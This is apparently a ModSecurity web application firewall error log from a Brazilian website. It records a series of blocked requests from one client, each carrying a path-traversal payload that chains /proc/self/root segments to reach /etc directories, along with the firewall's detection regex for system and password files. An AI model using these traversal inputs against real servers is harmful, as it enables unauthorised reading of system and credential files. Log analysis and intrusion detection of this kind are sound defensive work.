[Mon Mar 16 17:26:00.758081 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.241.46:39358] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnV6QpVkWug9HeOt9MzQAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:26:02.051881 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.241.46:39374] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnWqQpVkWug9HeOt9MzwAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:26:03.292728 2026] [:error] [pid 15061:tid 140411674785536] [client 74.7.241.46:39388] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnW6TCbgAP5jq5TehEAwAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:26:04.725154 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:39402] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnXLABkC4fWIHEf8EMowAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:26:05.943551 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.241.46:39414] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnXaTCbgAP5jq5TehEBwAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:26:07.230490 2026] [:error] [pid 15568:tid 140411641214720] [client 74.7.241.46:39420] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnX6QpVkWug9HeOt9M0gAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:26:08.451473 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.241.46:56852] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnYI6lpbStxTqkSkuB8AAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:26:09.867388 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:56860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnYbABkC4fWIHEf8EMpQAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:26:13.364561 2026] [:error] [pid 29802:tid 140411574073088] [client 74.7.241.46:56866] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnZc_BxrYCr4hPDw8CAAAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:26:46.000559 2026] [:error] [pid 15061:tid 140411699963648] [client 74.7.228.16:60380] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhnhaTCbgAP5jq5TehEEQAAAsU"]
[Mon Mar 16 17:26:53.737193 2026] [:error] [pid 29507:tid 140411699963648] [client 74.7.241.46:56874] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnjUr9dMAiw-8KANNgaAAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:27:43.654529 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:57348] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnv_9ocpUE4ed4uDwK4gAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:27:48.430259 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:35544] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhnxP9ocpUE4ed4uDwK6QAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:28:10.075462 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.241.46:41650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhn2rABkC4fWIHEf8EM-QAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:28:12.567111 2026] [:error] [pid 14895:tid 140411674785536] [client 74.7.241.46:49094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhn3FajLEzk2WiQ-10qdwAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:28:24.195443 2026] [:error] [pid 14895:tid 140411725141760] [client 74.7.241.46:49104] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhn51ajLEzk2WiQ-10qhQAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:28:26.669827 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:42954] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhn6rABkC4fWIHEf8EM_wAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:28:30.151109 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.241.46:42962] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhn7kr9dMAiw-8KANNhFAAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:28:33.404334 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:46570] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhn8aTCbgAP5jq5TehEOgAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:28:39.138702 2026] [:error] [pid 29507:tid 140411540502272] [client 74.7.241.46:46576] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhn90r9dMAiw-8KANNhJQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:29:04.220121 2026] [:error] [pid 29507:tid 140411540502272] [client 74.7.241.46:52422] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhoEEr9dMAiw-8KANNhVAAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:29:11.116360 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:35296] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhoF7ABkC4fWIHEf8ENFAAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
